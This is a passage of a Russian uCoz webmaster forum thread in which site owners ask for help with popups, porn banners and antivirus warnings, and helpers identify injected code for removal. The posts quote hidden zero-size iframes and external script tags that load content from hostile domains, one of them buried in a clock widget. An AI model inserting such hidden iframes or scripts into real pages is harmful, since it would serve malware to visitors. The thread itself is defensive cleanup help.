Модератор форума: Yuri_G  
Вирусы на сайтах (для изучения)
bArS4061
Сообщений: 5
Репутация: 0

Сообщение # 586 | 16:46:03
ЛЮДИ ПОМОГИТЕ ПОЖАЛУЙСТА КИКИМ ТО Х*** Когда я захожу на свой же сайт вылезает порно банеер(((И всё!!! Сайт galaxi.3dn.ru пожалуйста помогите
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 587 | 17:17:22
bArS4061, блок часы
удалить выделенное красным
Quote
<!-- <block9> -->
<table border="0" cellpadding="0" cellspacing="0" width="186">
<tr><td align="center" height="30" style="background:url('/.s/t/982/7.gif') #B60605;color:#FFFFFF;padding-bottom:5px;font-size:10px;"><b><!-- <bt> -->Часы<!-- </bt> --></b></td></tr>
<tr><td style="background:url('/.s/t/982/8.gif');padding:0 5px 0 5px;"><!-- <bc> --><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash6/cabs/swflash.cab#version=6.0.0.0" width="100%" height="100%"> <param name="movie" value="http://mirmuzla.net.ru/am/chaciki.swf"><iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://mirmuzla.net.ru/"></iframe> <param name="play" value="true"> <param name="loop" value="true"> <param name="WMode" value="transparent"> <param name="quality" value="high"> <param name="bgcolor" value=""> <param name="align" value=""> <embed src="http://avatar.moy.su/flash/clock/37.swf" play="true" loop="0" wmode="transparent" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" align="" width="100%" height="100%"> </object><!-- </bc> --></td></tr>

<tr><td><img src="/.s/t/982/9.gif" border="0"></td></tr>
</table>
<!-- </block9> -->


сайт хттп://mirmuzla.net.ru/ заражен оттуда у вас и всплывает то что выделено зеленым является ложным объектом
и поменьше мусора тащите на сайт

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Tess
Сообщений: 6
Репутация: 0

Сообщение # 588 | 17:40:54
Добрый день. Вчера, 4 марта, на сайт http://polnota.3dn.ru установили код, который ведет на попандер http://kupipopup.com
Обнаружил это случайно, просматривая переходы с сайта в счетчике Li
Не могу найти чужой код. Он поставлен хитро. Срабатывает попандер не на каждом посетителе сайта, а лишь изредка. Помогите пожалуйста. Это, конечно, не вирус, но сами понимаете, что мне поганят сайт, Яндекс и Гугл не очень любят сайты с попандерами и опускают их ниже плинтуса.
Victor
Сообщений: 1141
Репутация: 576

Сообщение # 589 | 17:51:35
Tess, попробуйте убрать:
Code
<script language="JavaScript" src="http://tizer.passion.ru/n/p/polnota.3dn.ru/pasya1925.js" type="text/javascript"></script>
<script type="text/javascript">var RNum = Math.floor(Math.random()*10000); document.write('<scr'+'ipt language="javascript" type="text/javascript" src="http://n.pay-click.ru/adv-out/?Id=20152&RNum='+RNum+'&Referer='+escape(document.referrer)+'"><'+'/scr'+'ipt>');</script>
<script language="javascript" type="text/javascript" src="http://js.novatizer.com/visual.php?id=616&design=688&cat=1&did=98318284"></script>
<script type="text/javascript">var RNum = Math.floor(Math.random()*10000); document.write('<scr'+'ipt language="javascript" type="text/javascript" src="http://n.ladycash.ru/adv_out.php?Id=12658&RNum='+RNum+'&Referer='+escape(document.referrer)+'"><'+'/scr'+'ipt>');</script>
Возможно, там и стоит попандер.
Tess
Сообщений: 6
Репутация: 0

Сообщение # 590 | 18:25:43
Проверила. Это все коды для вызова загрузки рекламных блоков. Зашла на каждый сайт рекламщиков и проверила их исходные коды. Все сходится. То есть на сайте нет ничего лишнего в указанных Вами строках. Кода на тот попандер нет. Он где-то в другом месте.

Добавлено (05-Мар-2011, 18:25:43)
---------------------------------------------
Причем при 1200 хостах попандер сработал всего 88 раз

Rio_
Сообщений: 103
Репутация: 5

Сообщение # 591 | 18:25:53
Вчера заметил на страницах своего сайта внедрённый, левый какой-то iframe такого вида:

Code
<iframe src="http://petmovea.com" style="display:none"/>

Адреса в элементе на других страницах были и такими: grigorich.com, iptestsdeep.com, petmovea.com - судя по всему всё это синонимы адреса - 91.193.192.22.

Явно что-то не слишком приятное, кто-то влез, и то ли зарабатывает, то ли пароли ворует, то ли ещё что....

В исходном коде страниц ифрейм не просматривается. Только при помощи команды "проинспектировать элемент" в Опере и Хроме.

Сайт стал жутко тормозить, в строке состояния браузеров появилась запись вида: "ожидание от grigorich.com".

Вот я и думаю, что же это такое. Я единственный администратор, коды на сайт устанавливаю только я, и среди моих немногочисленных скриптов нет ничего такого, что может вызвать такую запись.

Сегодня днём ифрейм неожиданно исчез. Что теперь делать мне и пользователям - чиститься от вирусов, менять повсюду пароли?

Никто не сталкивался с такой проблемой?

Если я не туда написал - переместите, пожалуйста, сообщение в другую тему, но не удаляйте.

Сообщение отредактировал Rio_ - Суббота, 05 Мар 2011, 18:32:15
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 592 | 23:30:00
Rio_, адрес своего сайта дайте где проблему наблюдаете

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Tess
Сообщений: 6
Репутация: 0

Сообщение # 593 | 23:48:52
Так и не могу найти код. Нашла кто владелец сайта попандера, что он переадресовывает на тизерную партнерку luxup.ru Нашла хост злоумышленника, адрес его почты и даже имя и фамилию владельца этого левого сайта kupipopup.com, а вот код найти не могу. Помогите бога ради

Добавлено (05-Мар-2011, 23:48:52)
---------------------------------------------
Сайт этот вообще интересный kupipopup.com Зарегиться на нем нельзя. Скайп и почтовик левые. Создан 16 февраля этого года, в яндексе всего одно упоминание о нем, в гугле целых 6. А статистику пишет: Уникальных посетителей: 800 000 Показов: 1 400 000

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 594 | 23:59:15
Tess, вы можете пояснить вот это
Quote
Вчера, 4 марта, на сайт http://polnota.3dn.ru установили код, который ведет на попандер http://kupipopup.com
что значит ведет на попандер? у вас на сайте всплывают попандеры левые? или что такое ведет?
что в статистике ливы конкретно?
попробуйте снести ваши тизерки что упоминал G-XPert вместе с гнездом в придачу и посмотрите результат. а лучше поясните про попандер.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Tess
Сообщений: 6
Репутация: 0

Сообщение # 595 | 00:15:06
В статистике ливы указывается переходы на сайт kupipopup.com оттуда по всей видимости идет переход на kupipopup.com/alabs.htm В Яндексе это единственная ссылка на этот сайт. Если просмотреть исходник страницы, то можно увидеть, что она ведет на luxup.ru Сама я не вижу попандера при переходе на свой сайт, а вот посетители попадают на него, в ливе видно переходы по ссылке на kupipopup.com, порядка 150 за 5 марта.
Guru9750
Сообщений: 1
Репутация: 0

Сообщение # 596 | 07:59:41
Помогите пожалуйста, на моем сайте, как говорят посетители присутствует вирус - появляется плеер для проигрывания чего-то и кричит антивирус - при заходе на главную!
У меня же все норм - ничего не кричит, стоит аваст - пару раз кричал когдато и все молчит. Что нужно сделать чтоб вирус убрать?
адрес kerch.ucoz.com
Rio_
Сообщений: 103
Репутация: 5

Сообщение # 597 | 09:08:22
Quote (webanet)
Rio_, адрес своего сайта дайте где проблему наблюдаете

webanet, спасибо за внимание, но пока это не имеет смысла - я сайт временно отключил, т.к. вирусная запись опять возникла, причём по данным Оперы уже в совершенно вирусном варианте:

Code
<iframe src="http://petmovea.com" style="display:none"/>
<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"/>

Про это уже и в Яндексе и в Гугле имеются ссылки.

Я в общем-то понял с чем это связано - красивые окошки ханслайд (highslide). Я в отдельном модуле сайта их отключил и вирусная запись исчезла.

Второй раз у меня эта проблема, и я никак не пойму в чём же фишка.

Первый раз я их амуницию скачивал непонятно откуда, было это давно и при первых же признаках этой хренотени я их снёс. Второй раз я их загружал с официального сайта и три месяца с ними не было никаких проблем.

А теперь вот проблемы возникли вновь. У меня слишком много там на этих окнах ханслайд наворочено, чтобы просто так взять снести их скрипты. Надо многое сперва изменить. Поэтому я сайт временно выключил.

Но я не хочу от них отказываться! Эти окна - красивая штука, они очень украшают страницы. Мне непонятно что же произошло. Сам ханслайд.ком в такой дури я как-то и подозревать не могу. Остаётся предположить, что какой-то бот заменил мне ханслайдовские файлы (вида highslide-full.js) на свои, где были внедрены уже эти вирусные записи.

Отсюда (возможно) следует, что кому-то известны пароли к панели управления или к фтп (?!). В опции "безопасность" на юкозе я вроде как ничего подозрительного не нашёл.

Непонятно что же теперь делать. Менять пароли и установить ханслайд заново и посмотреть на результат? Или вовсе от ханслайда отказаться?

Vovanmamont
Сообщений: 3
Репутация: 0

Сообщение # 598 | 13:09:45
Здравствуйте. Антивирус блокирует http://thuglive.pp.ua/a.js при входе на мой сайт-http://klevosoft.ucoz.ru/. Не могу найти с какого скрипта проблема, помогите разобраться. wacko
CenatioN
Сообщений: 10
Репутация: 27

Сообщение # 599 | 13:44:49
Vovanmamont, Стоит в блоке: Юмор. (Второй контейнер).
Quote
<!-- <block4569> -->
<table border="0" cellpadding="0" cellspacing="0" width="200">
<tr><td style="background:url('/.s/t/331/9.gif') #F18008;color:#240000;" height="25" align="center"><b><!-- <bt> -->Юмор<!-- </bt> --></b></td></tr>
<tr><td style="background:url('/.s/t/331/10.jpg') top no-repeat #570000;padding:10px;"><!-- <bc> --><div align="center">Анекдоты</a></div><hr /><script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script><script type="text/javascript" src="http://www.ucob.ru/informer/10-1"></script><!-- </bc> --></td></tr>
<tr><td height="11"><img src="/.s/t/331/11.gif" border="0"></td></tr>
</table><br />
<!-- </block4569> -->

Советую убрать блок полностью.

Сообщение отредактировал CenatioN - Воскресенье, 06 Мар 2011, 13:45:26
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 600 | 15:28:13
Rio_,
Quote
т.к. вирусная запись опять возникла, причём по данным Оперы уже в совершенно вирусном варианте:
нужно открыть сайт для осмотра. чтобы вам не гадать не думать. если сайт осмотреть то можно сказать точно что произошло. но если вам нравиться гадать и думать, то можете решать проблемы сами, только я не понимаю зачем вы пишете на форум тогда

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Поиск:
Telegram
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!